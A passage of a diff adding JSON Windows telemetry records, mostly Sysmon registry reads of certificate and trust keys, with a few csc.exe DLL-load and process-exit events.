"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861210000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "terminate", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
